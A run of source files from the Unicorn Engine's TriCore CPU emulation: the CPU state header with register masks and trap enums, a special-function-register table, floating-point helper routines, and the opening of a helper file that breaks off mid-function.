* * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #ifndef TRICORE_CPU_H #define TRICORE_CPU_H #include "cpu-qom.h" #include "exec/cpu-defs.h" #include "tricore-defs.h" struct tricore_boot_info; typedef struct tricore_def_t tricore_def_t; // struct CPUTriCoreState { typedef struct CPUTriCoreState { /* GPR Register */ uint32_t gpr_a[16]; uint32_t gpr_d[16]; /* CSFR Register */ uint32_t PCXI; /* Frequently accessed PSW_USB bits are stored separately for efficiency. This contains all the other bits. Use psw_{read,write} to access the whole PSW. 
*/ uint32_t PSW; /* PSW flag cache for faster execution */ uint32_t PSW_USB_C; uint32_t PSW_USB_V; /* Only if bit 31 set, then flag is set */ uint32_t PSW_USB_SV; /* Only if bit 31 set, then flag is set */ uint32_t PSW_USB_AV; /* Only if bit 31 set, then flag is set. */ uint32_t PSW_USB_SAV; /* Only if bit 31 set, then flag is set. */ uint32_t PC; uint32_t SYSCON; uint32_t CPU_ID; uint32_t CORE_ID; uint32_t BIV; uint32_t BTV; uint32_t ISP; uint32_t ICR; uint32_t FCX; uint32_t LCX; uint32_t COMPAT; /* Mem Protection Register */ uint32_t DPR0_0L; uint32_t DPR0_0U; uint32_t DPR0_1L; uint32_t DPR0_1U; uint32_t DPR0_2L; uint32_t DPR0_2U; uint32_t DPR0_3L; uint32_t DPR0_3U; uint32_t DPR1_0L; uint32_t DPR1_0U; uint32_t DPR1_1L; uint32_t DPR1_1U; uint32_t DPR1_2L; uint32_t DPR1_2U; uint32_t DPR1_3L; uint32_t DPR1_3U; uint32_t DPR2_0L; uint32_t DPR2_0U; uint32_t DPR2_1L; uint32_t DPR2_1U; uint32_t DPR2_2L; uint32_t DPR2_2U; uint32_t DPR2_3L; uint32_t DPR2_3U; uint32_t DPR3_0L; uint32_t DPR3_0U; uint32_t DPR3_1L; uint32_t DPR3_1U; uint32_t DPR3_2L; uint32_t DPR3_2U; uint32_t DPR3_3L; uint32_t DPR3_3U; uint32_t CPR0_0L; uint32_t CPR0_0U; uint32_t CPR0_1L; uint32_t CPR0_1U; uint32_t CPR0_2L; uint32_t CPR0_2U; uint32_t CPR0_3L; uint32_t CPR0_3U; uint32_t CPR1_0L; uint32_t CPR1_0U; uint32_t CPR1_1L; uint32_t CPR1_1U; uint32_t CPR1_2L; uint32_t CPR1_2U; uint32_t CPR1_3L; uint32_t CPR1_3U; uint32_t CPR2_0L; uint32_t CPR2_0U; uint32_t CPR2_1L; uint32_t CPR2_1U; uint32_t CPR2_2L; uint32_t CPR2_2U; uint32_t CPR2_3L; uint32_t CPR2_3U; uint32_t CPR3_0L; uint32_t CPR3_0U; uint32_t CPR3_1L; uint32_t CPR3_1U; uint32_t CPR3_2L; uint32_t CPR3_2U; uint32_t CPR3_3L; uint32_t CPR3_3U; uint32_t DPM0; uint32_t DPM1; uint32_t DPM2; uint32_t DPM3; uint32_t CPM0; uint32_t CPM1; uint32_t CPM2; uint32_t CPM3; /* Memory Management Registers */ uint32_t MMU_CON; uint32_t MMU_ASI; uint32_t MMU_TVA; uint32_t MMU_TPA; uint32_t MMU_TPX; uint32_t MMU_TFA; /* {1.3.1 only */ uint32_t BMACON; uint32_t SMACON; uint32_t DIEAR; uint32_t DIETR; uint32_t CCDIER; uint32_t MIECON; uint32_t PIEAR; uint32_t PIETR; uint32_t CCPIER; /*} */ /* Debug Registers */ uint32_t DBGSR; uint32_t EXEVT; uint32_t CREVT; uint32_t SWEVT; uint32_t TR0EVT; uint32_t TR1EVT; uint32_t DMS; uint32_t DCX; uint32_t DBGTCR; uint32_t CCTRL; uint32_t CCNT; uint32_t ICNT; uint32_t M1CNT; uint32_t M2CNT; uint32_t M3CNT; /* Floating Point Registers */ float_status fp_status; /* QEMU */ int error_code; uint32_t hflags; /* CPU State */ const tricore_def_t *cpu_model; void *irq[8]; struct QEMUTimer *timer; /* Internal timer */ /* Fields up to this point are cleared by a CPU reset */ int end_reset_fields; /* Fields from here on are preserved across CPU reset. */ uint32_t features; // Unicorn engine struct uc_struct *uc; } CPUTriCoreState; /** * TriCoreCPU: * @env: #CPUTriCoreState * * A TriCore CPU. */ // TODO: Why is the type def needed? Without it the later typedef fails to find this... ? 
typedef struct TriCoreCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUTriCoreState env; struct TriCoreCPUClass cc; } TriCoreCPU; hwaddr tricore_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); void tricore_cpu_dump_state(CPUState *cpu, FILE *f, int flags); #define MASK_PCXI_PCPN 0xff000000 #define MASK_PCXI_PIE_1_3 0x00800000 #define MASK_PCXI_PIE_1_6 0x00200000 #define MASK_PCXI_UL 0x00400000 #define MASK_PCXI_PCXS 0x000f0000 #define MASK_PCXI_PCXO 0x0000ffff #define MASK_PSW_USB 0xff000000 #define MASK_USB_C 0x80000000 #define MASK_USB_V 0x40000000 #define MASK_USB_SV 0x20000000 #define MASK_USB_AV 0x10000000 #define MASK_USB_SAV 0x08000000 #define MASK_PSW_PRS 0x00003000 #define MASK_PSW_IO 0x00000c00 #define MASK_PSW_IS 0x00000200 #define MASK_PSW_GW 0x00000100 #define MASK_PSW_CDE 0x00000080 #define MASK_PSW_CDC 0x0000007f #define MASK_PSW_FPU_RM 0x3000000 #define MASK_SYSCON_PRO_TEN 0x2 #define MASK_SYSCON_FCD_SF 0x1 #define MASK_CPUID_MOD 0xffff0000 #define MASK_CPUID_MOD_32B 0x0000ff00 #define MASK_CPUID_REV 0x000000ff #define MASK_ICR_PIPN 0x00ff0000 #define MASK_ICR_IE_1_3 0x00000100 #define MASK_ICR_IE_1_6 0x00008000 #define MASK_ICR_CCPN 0x000000ff #define MASK_FCX_FCXS 0x000f0000 #define MASK_FCX_FCXO 0x0000ffff #define MASK_LCX_LCXS 0x000f0000 #define MASK_LCX_LCX0 0x0000ffff #define MASK_DBGSR_DE 0x1 #define MASK_DBGSR_HALT 0x6 #define MASK_DBGSR_SUSP 0x10 #define MASK_DBGSR_PREVSUSP 0x20 #define MASK_DBGSR_PEVT 0x40 #define MASK_DBGSR_EVTSRC 0x1f00 #define TRICORE_HFLAG_KUU 0x3 #define TRICORE_HFLAG_UM0 0x00002 /* user mode-0 flag */ #define TRICORE_HFLAG_UM1 0x00001 /* user mode-1 flag */ #define TRICORE_HFLAG_SM 0x00000 /* kernel mode flag */ enum tricore_features { TRICORE_FEATURE_13, TRICORE_FEATURE_131, TRICORE_FEATURE_16, TRICORE_FEATURE_161, }; static inline int tricore_feature(CPUTriCoreState *env, int feature) { return (env->features & (1ULL << feature)) != 0; } /* TriCore Traps Classes*/ enum { TRAPC_NONE = -1, TRAPC_MMU = 0, TRAPC_PROT = 1, TRAPC_INSN_ERR = 2, TRAPC_CTX_MNG = 3, TRAPC_SYSBUS = 4, TRAPC_ASSERT = 5, TRAPC_SYSCALL = 6, TRAPC_NMI = 7, TRAPC_IRQ = 8 }; /* Class 0 TIN */ enum { TIN0_VAF = 0, TIN0_VAP = 1, }; /* Class 1 TIN */ enum { TIN1_PRIV = 1, TIN1_MPR = 2, TIN1_MPW = 3, TIN1_MPX = 4, TIN1_MPP = 5, TIN1_MPN = 6, TIN1_GRWP = 7, }; /* Class 2 TIN */ enum { TIN2_IOPC = 1, TIN2_UOPC = 2, TIN2_OPD = 3, TIN2_ALN = 4, TIN2_MEM = 5, }; /* Class 3 TIN */ enum { TIN3_FCD = 1, TIN3_CDO = 2, TIN3_CDU = 3, TIN3_FCU = 4, TIN3_CSU = 5, TIN3_CTYP = 6, TIN3_NEST = 7, }; /* Class 4 TIN */ enum { TIN4_PSE = 1, TIN4_DSE = 2, TIN4_DAE = 3, TIN4_CAE = 4, TIN4_PIE = 5, TIN4_DIE = 6, }; /* Class 5 TIN */ enum { TIN5_OVF = 1, TIN5_SOVF = 1, }; /* Class 6 TIN * * Is always TIN6_SYS */ /* Class 7 TIN */ enum { TIN7_NMI = 0, }; uint32_t psw_read(CPUTriCoreState *env); void psw_write(CPUTriCoreState *env, uint32_t val); int tricore_cpu_gdb_read_register(CPUState *cs, GByteArray *mem_buf, int n); int tricore_cpu_gdb_write_register(CPUState *cs, uint8_t *mem_buf, int n); void fpu_set_state(CPUTriCoreState *env); #define MMU_USER_IDX 2 void tricore_cpu_list(void); #define cpu_list tricore_cpu_list static inline int cpu_mmu_index(CPUTriCoreState *env, bool ifetch) { return 0; } typedef CPUTriCoreState CPUArchState; typedef TriCoreCPU ArchCPU; #include "exec/cpu-all.h" void cpu_state_reset(CPUTriCoreState *s); void tricore_tcg_init(struct uc_struct *uc); static inline void cpu_get_tb_cpu_state(CPUTriCoreState *env, target_ulong *pc, 
                                        target_ulong *cs_base, uint32_t *flags)
{
    *pc = env->PC;
    *cs_base = 0;
    *flags = 0;
}

#define TRICORE_CPU_TYPE_SUFFIX "-" TYPE_TRICORE_CPU
#define TRICORE_CPU_TYPE_NAME(model) model TRICORE_CPU_TYPE_SUFFIX
#define CPU_RESOLVING_TYPE TYPE_TRICORE_CPU

/* helpers.c */
bool tricore_cpu_tlb_fill(CPUState *cs, vaddr address, int size,
                          MMUAccessType access_type, int mmu_idx,
                          bool probe, uintptr_t retaddr);

#endif /* TRICORE_CPU_H */
unicorn-2.1.1/qemu/target/tricore/csfr.def
/* A(ll) access permitted
   R(ead only) access
   E(nd init protected) access

   A|R|E(offset, register, feature introducing reg)

   NOTE: PSW is handled as a special case in gen_mtcr/mfcr */
A(0xfe00, PCXI, TRICORE_FEATURE_13)
A(0xfe08, PC, TRICORE_FEATURE_13)
A(0xfe14, SYSCON, TRICORE_FEATURE_13)
R(0xfe18, CPU_ID, TRICORE_FEATURE_13)
R(0xfe1c, CORE_ID, TRICORE_FEATURE_161)
E(0xfe20, BIV, TRICORE_FEATURE_13)
E(0xfe24, BTV, TRICORE_FEATURE_13)
E(0xfe28, ISP, TRICORE_FEATURE_13)
A(0xfe2c, ICR, TRICORE_FEATURE_13)
A(0xfe38, FCX, TRICORE_FEATURE_13)
A(0xfe3c, LCX, TRICORE_FEATURE_13)
E(0x9400, COMPAT, TRICORE_FEATURE_131)
/* memory protection register */
A(0xC000, DPR0_0L, TRICORE_FEATURE_13)
A(0xC004, DPR0_0U, TRICORE_FEATURE_13)
A(0xC008, DPR0_1L, TRICORE_FEATURE_13)
A(0xC00C, DPR0_1U, TRICORE_FEATURE_13)
A(0xC010, DPR0_2L, TRICORE_FEATURE_13)
A(0xC014, DPR0_2U, TRICORE_FEATURE_13)
A(0xC018, DPR0_3L, TRICORE_FEATURE_13)
A(0xC01C, DPR0_3U, TRICORE_FEATURE_13)
A(0xC400, DPR1_0L, TRICORE_FEATURE_13)
A(0xC404, DPR1_0U, TRICORE_FEATURE_13)
A(0xC408, DPR1_1L, TRICORE_FEATURE_13)
A(0xC40C, DPR1_1U, TRICORE_FEATURE_13)
A(0xC410, DPR1_2L, TRICORE_FEATURE_13)
A(0xC414, DPR1_2U, TRICORE_FEATURE_13)
A(0xC418, DPR1_3L, TRICORE_FEATURE_13)
A(0xC41C, DPR1_3U, TRICORE_FEATURE_13)
A(0xC800, DPR2_0L, TRICORE_FEATURE_13)
A(0xC804, DPR2_0U, TRICORE_FEATURE_13)
A(0xC808, DPR2_1L, TRICORE_FEATURE_13)
A(0xC80C, DPR2_1U, TRICORE_FEATURE_13)
A(0xC810, DPR2_2L, TRICORE_FEATURE_13)
A(0xC814, DPR2_2U, TRICORE_FEATURE_13)
A(0xC818, DPR2_3L, TRICORE_FEATURE_13)
A(0xC81C, DPR2_3U, TRICORE_FEATURE_13)
A(0xCC00, DPR3_0L, TRICORE_FEATURE_13)
A(0xCC04, DPR3_0U, TRICORE_FEATURE_13)
A(0xCC08, DPR3_1L, TRICORE_FEATURE_13)
A(0xCC0C, DPR3_1U, TRICORE_FEATURE_13)
A(0xCC10, DPR3_2L, TRICORE_FEATURE_13)
A(0xCC14, DPR3_2U, TRICORE_FEATURE_13)
A(0xCC18, DPR3_3L, TRICORE_FEATURE_13)
A(0xCC1C, DPR3_3U, TRICORE_FEATURE_13)
A(0xD000, CPR0_0L, TRICORE_FEATURE_13)
A(0xD004, CPR0_0U, TRICORE_FEATURE_13)
A(0xD008, CPR0_1L, TRICORE_FEATURE_13)
A(0xD00C, CPR0_1U, TRICORE_FEATURE_13)
A(0xD010, CPR0_2L, TRICORE_FEATURE_13)
A(0xD014, CPR0_2U, TRICORE_FEATURE_13)
A(0xD018, CPR0_3L, TRICORE_FEATURE_13)
A(0xD01C, CPR0_3U, TRICORE_FEATURE_13)
A(0xD400, CPR1_0L, TRICORE_FEATURE_13)
A(0xD404, CPR1_0U, TRICORE_FEATURE_13)
A(0xD408, CPR1_1L, TRICORE_FEATURE_13)
A(0xD40C, CPR1_1U, TRICORE_FEATURE_13)
A(0xD410, CPR1_2L, TRICORE_FEATURE_13)
A(0xD414, CPR1_2U, TRICORE_FEATURE_13)
A(0xD418, CPR1_3L, TRICORE_FEATURE_13)
A(0xD41C, CPR1_3U, TRICORE_FEATURE_13)
A(0xD800, CPR2_0L, TRICORE_FEATURE_13)
A(0xD804, CPR2_0U, TRICORE_FEATURE_13)
A(0xD808, CPR2_1L, TRICORE_FEATURE_13)
A(0xD80C, CPR2_1U, TRICORE_FEATURE_13)
A(0xD810, CPR2_2L, TRICORE_FEATURE_13)
A(0xD814, CPR2_2U, TRICORE_FEATURE_13)
A(0xD818, CPR2_3L, TRICORE_FEATURE_13)
A(0xD81C, CPR2_3U, TRICORE_FEATURE_13)
A(0xDC00, CPR3_0L, TRICORE_FEATURE_13)
A(0xDC04, CPR3_0U, TRICORE_FEATURE_13)
A(0xDC08, CPR3_1L, TRICORE_FEATURE_13)
A(0xDC0C, CPR3_1U, TRICORE_FEATURE_13)
A(0xDC10, CPR3_2L, TRICORE_FEATURE_13)
A(0xDC14, CPR3_2U, TRICORE_FEATURE_13)
A(0xDC18, CPR3_3L, TRICORE_FEATURE_13)
A(0xDC1C, CPR3_3U, TRICORE_FEATURE_13)
A(0xE000, DPM0, TRICORE_FEATURE_13)
A(0xE080, DPM1, TRICORE_FEATURE_13)
A(0xE100, DPM2, TRICORE_FEATURE_13)
A(0xE180, DPM3, TRICORE_FEATURE_13)
A(0xE200, CPM0, TRICORE_FEATURE_13)
A(0xE280, CPM1, TRICORE_FEATURE_13)
A(0xE300, CPM2, TRICORE_FEATURE_13)
A(0xE380, CPM3, TRICORE_FEATURE_13)
/* memory management registers */
A(0x8000, MMU_CON, TRICORE_FEATURE_13)
A(0x8004, MMU_ASI, TRICORE_FEATURE_13)
A(0x800C, MMU_TVA, TRICORE_FEATURE_13)
A(0x8010, MMU_TPA, TRICORE_FEATURE_13)
A(0x8014, MMU_TPX, TRICORE_FEATURE_13)
A(0x8018, MMU_TFA, TRICORE_FEATURE_13)
E(0x9004, BMACON, TRICORE_FEATURE_131)
E(0x900C, SMACON, TRICORE_FEATURE_131)
A(0x9020, DIEAR, TRICORE_FEATURE_131)
A(0x9024, DIETR, TRICORE_FEATURE_131)
A(0x9028, CCDIER, TRICORE_FEATURE_131)
E(0x9044, MIECON, TRICORE_FEATURE_131)
A(0x9210, PIEAR, TRICORE_FEATURE_131)
A(0x9214, PIETR, TRICORE_FEATURE_131)
A(0x9218, CCPIER, TRICORE_FEATURE_131)
/* debug registers */
A(0xFD00, DBGSR, TRICORE_FEATURE_13)
A(0xFD08, EXEVT, TRICORE_FEATURE_13)
A(0xFD0C, CREVT, TRICORE_FEATURE_13)
A(0xFD10, SWEVT, TRICORE_FEATURE_13)
A(0xFD20, TR0EVT, TRICORE_FEATURE_13)
A(0xFD24, TR1EVT, TRICORE_FEATURE_13)
A(0xFD40, DMS, TRICORE_FEATURE_13)
A(0xFD44, DCX, TRICORE_FEATURE_13)
A(0xFD48, DBGTCR, TRICORE_FEATURE_131)
A(0xFC00, CCTRL, TRICORE_FEATURE_131)
A(0xFC04, CCNT, TRICORE_FEATURE_131)
A(0xFC08, ICNT, TRICORE_FEATURE_131)
A(0xFC0C, M1CNT, TRICORE_FEATURE_131)
A(0xFC10, M2CNT, TRICORE_FEATURE_131)
A(0xFC14, M3CNT, TRICORE_FEATURE_131)
unicorn-2.1.1/qemu/target/tricore/fpu_helper.c
/*
 * TriCore emulation for qemu: fpu helper.
* * Copyright (c) 2016 Bastian Koppelmann University of Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #include "qemu/osdep.h" #include "cpu.h" #include "qemu/host-utils.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" #define QUIET_NAN 0x7fc00000 #define ADD_NAN 0x7fc00001 #define SQRT_NAN 0x7fc00004 #define DIV_NAN 0x7fc00008 #define MUL_NAN 0x7fc00002 #define FPU_FS PSW_USB_C #define FPU_FI PSW_USB_V #define FPU_FV PSW_USB_SV #define FPU_FZ PSW_USB_AV #define FPU_FU PSW_USB_SAV #define float32_sqrt_nan make_float32(SQRT_NAN) #define float32_quiet_nan make_float32(QUIET_NAN) /* we don't care about input_denormal */ static inline uint8_t f_get_excp_flags(CPUTriCoreState *env) { return get_float_exception_flags(&env->fp_status) & (float_flag_invalid | float_flag_overflow | float_flag_underflow | float_flag_output_denormal | float_flag_divbyzero | float_flag_inexact); } static inline float32 f_maddsub_nan_result(float32 arg1, float32 arg2, float32 arg3, float32 result, uint32_t muladd_negate_c) { uint32_t aSign, bSign, cSign; uint32_t aExp, bExp, cExp; if (float32_is_any_nan(arg1) || float32_is_any_nan(arg2) || float32_is_any_nan(arg3)) { return QUIET_NAN; } else if (float32_is_infinity(arg1) && float32_is_zero(arg2)) { return MUL_NAN; } else if (float32_is_zero(arg1) && float32_is_infinity(arg2)) { return MUL_NAN; } else { aSign = arg1 >> 31; bSign = arg2 >> 31; cSign = arg3 >> 31; aExp = (arg1 >> 23) & 0xff; bExp = (arg2 >> 23) & 0xff; cExp = (arg3 >> 23) & 0xff; if (muladd_negate_c) { cSign ^= 1; } if (((aExp == 0xff) || (bExp == 0xff)) && (cExp == 0xff)) { if (aSign ^ bSign ^ cSign) { return ADD_NAN; } } } return result; } static void f_update_psw_flags(CPUTriCoreState *env, uint8_t flags) { uint8_t some_excp = 0; set_float_exception_flags(0, &env->fp_status); if (flags & float_flag_invalid) { env->FPU_FI = 1 << 31; some_excp = 1; } if (flags & float_flag_overflow) { env->FPU_FV = 1 << 31; some_excp = 1; } if (flags & float_flag_underflow || flags & float_flag_output_denormal) { env->FPU_FU = 1 << 31; some_excp = 1; } if (flags & float_flag_divbyzero) { env->FPU_FZ = 1 << 31; some_excp = 1; } if (flags & float_flag_inexact || flags & float_flag_output_denormal) { env->PSW |= 1 << 26; some_excp = 1; } env->FPU_FS = some_excp; } #define FADD_SUB(op) \ uint32_t helper_f##op(CPUTriCoreState *env, uint32_t r1, uint32_t r2) \ { \ float32 arg1 = make_float32(r1); \ float32 arg2 = make_float32(r2); \ uint32_t flags; \ float32 f_result; \ \ f_result = float32_##op(arg2, arg1, &env->fp_status); \ flags = f_get_excp_flags(env); \ if (flags) { \ /* If the output is a NaN, but the inputs aren't, \ we return a unique value. 
*/ \ if ((flags & float_flag_invalid) \ && !float32_is_any_nan(arg1) \ && !float32_is_any_nan(arg2)) { \ f_result = ADD_NAN; \ } \ f_update_psw_flags(env, flags); \ } else { \ env->FPU_FS = 0; \ } \ return (uint32_t)f_result; \ } FADD_SUB(add) FADD_SUB(sub) uint32_t helper_fmul(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint32_t flags; float32 arg1 = make_float32(r1); float32 arg2 = make_float32(r2); float32 f_result; f_result = float32_mul(arg1, arg2, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { /* If the output is a NaN, but the inputs aren't, we return a unique value. */ if ((flags & float_flag_invalid) && !float32_is_any_nan(arg1) && !float32_is_any_nan(arg2)) { f_result = MUL_NAN; } f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } /* * Target TriCore QSEED.F significand Lookup Table * * The QSEED.F output significand depends on the least-significant * exponent bit and the 6 most-significant significand bits. * * IEEE 754 float datatype * partitioned into Sign (S), Exponent (E) and Significand (M): * * S E E E E E E E E M M M M M M ... * | | | * +------+------+-------+-------+ * | | * for lookup table * calculating index for * output E output M * * This lookup table was extracted by analyzing QSEED output * from the real hardware */ static const uint8_t target_qseed_significand_table[128] = { 253, 252, 245, 244, 239, 238, 231, 230, 225, 224, 217, 216, 211, 210, 205, 204, 201, 200, 195, 194, 189, 188, 185, 184, 179, 178, 175, 174, 169, 168, 165, 164, 161, 160, 157, 156, 153, 152, 149, 148, 145, 144, 141, 140, 137, 136, 133, 132, 131, 130, 127, 126, 123, 122, 121, 120, 117, 116, 115, 114, 111, 110, 109, 108, 103, 102, 99, 98, 93, 92, 89, 88, 83, 82, 79, 78, 75, 74, 71, 70, 67, 66, 63, 62, 59, 58, 55, 54, 53, 52, 49, 48, 45, 44, 43, 42, 39, 38, 37, 36, 33, 32, 31, 30, 27, 26, 25, 24, 23, 22, 19, 18, 17, 16, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2 }; uint32_t helper_qseed(CPUTriCoreState *env, uint32_t r1) { uint32_t arg1, S, E, M, E_minus_one, m_idx; uint32_t new_E, new_M, new_S, result; arg1 = make_float32(r1); /* fetch IEEE-754 fields S, E and the uppermost 6-bit of M */ S = extract32(arg1, 31, 1); E = extract32(arg1, 23, 8); M = extract32(arg1, 17, 6); if (float32_is_any_nan(arg1)) { result = float32_quiet_nan; } else if (float32_is_zero_or_denormal(arg1)) { if (float32_is_neg(arg1)) { result = float32_infinity | (1 << 31); } else { result = float32_infinity; } } else if (float32_is_neg(arg1)) { result = float32_sqrt_nan; } else if (float32_is_infinity(arg1)) { result = float32_zero; } else { E_minus_one = E - 1; m_idx = ((E_minus_one & 1) << 6) | M; new_S = S; new_E = 0xBD - E_minus_one / 2; new_M = target_qseed_significand_table[m_idx]; result = 0; result = deposit32(result, 31, 1, new_S); result = deposit32(result, 23, 8, new_E); result = deposit32(result, 15, 8, new_M); } if (float32_is_signaling_nan(arg1, &env->fp_status) || result == float32_sqrt_nan) { env->FPU_FI = 1 << 31; env->FPU_FS = 1; } else { env->FPU_FS = 0; } return (uint32_t) result; } uint32_t helper_fdiv(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint32_t flags; float32 arg1 = make_float32(r1); float32 arg2 = make_float32(r2); float32 f_result; f_result = float32_div(arg1, arg2 , &env->fp_status); flags = f_get_excp_flags(env); if (flags) { /* If the output is a NaN, but the inputs aren't, we return a unique value. 
*/ if ((flags & float_flag_invalid) && !float32_is_any_nan(arg1) && !float32_is_any_nan(arg2)) { f_result = DIV_NAN; } f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } uint32_t helper_fmadd(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3) { uint32_t flags; float32 arg1 = make_float32(r1); float32 arg2 = make_float32(r2); float32 arg3 = make_float32(r3); float32 f_result; f_result = float32_muladd(arg1, arg2, arg3, 0, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { if (flags & float_flag_invalid) { arg1 = float32_squash_input_denormal(arg1, &env->fp_status); arg2 = float32_squash_input_denormal(arg2, &env->fp_status); arg3 = float32_squash_input_denormal(arg3, &env->fp_status); f_result = f_maddsub_nan_result(arg1, arg2, arg3, f_result, 0); } f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } uint32_t helper_fmsub(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3) { uint32_t flags; float32 arg1 = make_float32(r1); float32 arg2 = make_float32(r2); float32 arg3 = make_float32(r3); float32 f_result; f_result = float32_muladd(arg1, arg2, arg3, float_muladd_negate_product, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { if (flags & float_flag_invalid) { arg1 = float32_squash_input_denormal(arg1, &env->fp_status); arg2 = float32_squash_input_denormal(arg2, &env->fp_status); arg3 = float32_squash_input_denormal(arg3, &env->fp_status); f_result = f_maddsub_nan_result(arg1, arg2, arg3, f_result, 1); } f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } uint32_t helper_fcmp(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint32_t result, flags; float32 arg1 = make_float32(r1); float32 arg2 = make_float32(r2); set_flush_inputs_to_zero(0, &env->fp_status); result = 1 << (float32_compare_quiet(arg1, arg2, &env->fp_status) + 1); result |= float32_is_denormal(arg1) << 4; result |= float32_is_denormal(arg2) << 5; flags = f_get_excp_flags(env); if (flags) { f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } set_flush_inputs_to_zero(1, &env->fp_status); return result; } uint32_t helper_ftoi(CPUTriCoreState *env, uint32_t arg) { float32 f_arg = make_float32(arg); int32_t result, flags; result = float32_to_int32(f_arg, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { if (float32_is_any_nan(f_arg)) { result = 0; } f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)result; } uint32_t helper_itof(CPUTriCoreState *env, uint32_t arg) { float32 f_result; uint32_t flags; f_result = int32_to_float32(arg, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } uint32_t helper_utof(CPUTriCoreState *env, uint32_t arg) { float32 f_result; uint32_t flags; f_result = uint32_to_float32(arg, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } uint32_t helper_ftoiz(CPUTriCoreState *env, uint32_t arg) { float32 f_arg = make_float32(arg); uint32_t result; int32_t flags; result = float32_to_int32_round_to_zero(f_arg, &env->fp_status); flags = f_get_excp_flags(env); if (flags & float_flag_invalid) { flags &= ~float_flag_inexact; if (float32_is_any_nan(f_arg)) { result = 0; } } if (flags) { f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return result; } uint32_t helper_ftouz(CPUTriCoreState *env, uint32_t arg) { 
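    /* Added note: FTOUZ converts float32 -> uint32 with truncation (round
     * toward zero). Per the handling below, a NaN input yields 0 with only
     * the invalid flag kept, and a negative (non-NaN) input is forced to 0
     * with the invalid flag raised even when softfloat itself did not
     * set it. */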
float32 f_arg = make_float32(arg); uint32_t result; int32_t flags; result = float32_to_uint32_round_to_zero(f_arg, &env->fp_status); flags = f_get_excp_flags(env); if (flags & float_flag_invalid) { flags &= ~float_flag_inexact; if (float32_is_any_nan(f_arg)) { result = 0; } } else if (float32_lt_quiet(f_arg, 0, &env->fp_status)) { flags = float_flag_invalid; result = 0; } if (flags) { f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return result; } void helper_updfl(CPUTriCoreState *env, uint32_t arg) { env->FPU_FS = extract32(arg, 7, 1) & extract32(arg, 15, 1); env->FPU_FI = (extract32(arg, 6, 1) & extract32(arg, 14, 1)) << 31; env->FPU_FV = (extract32(arg, 5, 1) & extract32(arg, 13, 1)) << 31; env->FPU_FZ = (extract32(arg, 4, 1) & extract32(arg, 12, 1)) << 31; env->FPU_FU = (extract32(arg, 3, 1) & extract32(arg, 11, 1)) << 31; /* clear FX and RM */ env->PSW &= ~(extract32(arg, 10, 1) << 26); env->PSW |= (extract32(arg, 2, 1) & extract32(arg, 10, 1)) << 26; fpu_set_state(env); } ���������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/helper.c����������������������������������������������������������0000664�0000000�0000000�00000011107�14675241067�0020533�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
 */

/*
    Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022
    Copyright 2022 Aptiv
*/

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/exec-all.h"
#include "fpu/softfloat-helpers.h"

enum {
    TLBRET_DIRTY = -4,
    TLBRET_INVALID = -3,
    TLBRET_NOMATCH = -2,
    TLBRET_BADADDR = -1,
    TLBRET_MATCH = 0
};

#if defined(CONFIG_SOFTMMU)
static int get_physical_address(CPUTriCoreState *env, hwaddr *physical,
                                int *prot, target_ulong address,
                                MMUAccessType access_type, int mmu_idx)
{
    int ret = TLBRET_MATCH;

    *physical = address & 0xFFFFFFFF;
    *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC;

    return ret;
}

hwaddr tricore_cpu_get_phys_page_debug(CPUState *cs, vaddr addr)
{
    TriCoreCPU *cpu = TRICORE_CPU(cs);
